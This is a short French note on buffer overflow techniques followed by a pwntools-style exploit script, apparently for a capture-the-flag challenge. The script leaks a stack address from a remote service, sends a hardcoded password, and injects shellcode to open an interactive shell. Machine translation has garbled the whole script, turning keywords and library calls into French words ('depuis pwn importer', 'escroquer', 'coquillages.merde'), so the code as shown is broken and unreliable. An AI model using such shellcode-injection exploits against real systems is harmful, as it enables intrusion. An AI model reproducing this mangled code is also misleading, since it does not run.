Notes sur les techniques de débordement de tampon
Le code d'exploitation est ci-dessous
##Bebut
depuis pwn importer *
contexte.binaire = ELFE('./ordinateur chauve-souris')
escroquer = télécommande(‘157.245.39.76’,31662)
escroquer.ligne d'envoi(‘1’)
escroquer.jusqu'à ce que('0x')
pile_base = int(("0x"+escroquer.recv().décoder('latin-1').diviser()[0]),16)
enregistrer.succès(F'base de pile : {hexadécimal(pile_base)}‘)
escroquer.ligne d'envoi(‘2’)
escroquer.ligne d'envoi('b4tp@$$w0rd!')
charge utile = asme(coquillages.papa() + coquillages.merde()) Shellcode #
charge utile += b'UN'*(84 – len(charge utile)) # non
charge utile += p64(pile_base) Base de pile #
escroquer.ligne d'envoi(charge utile)
escroquer.ligne d'envoi(‘3’)
escroquer.interactif()
##Fin
Vidéo pas à pas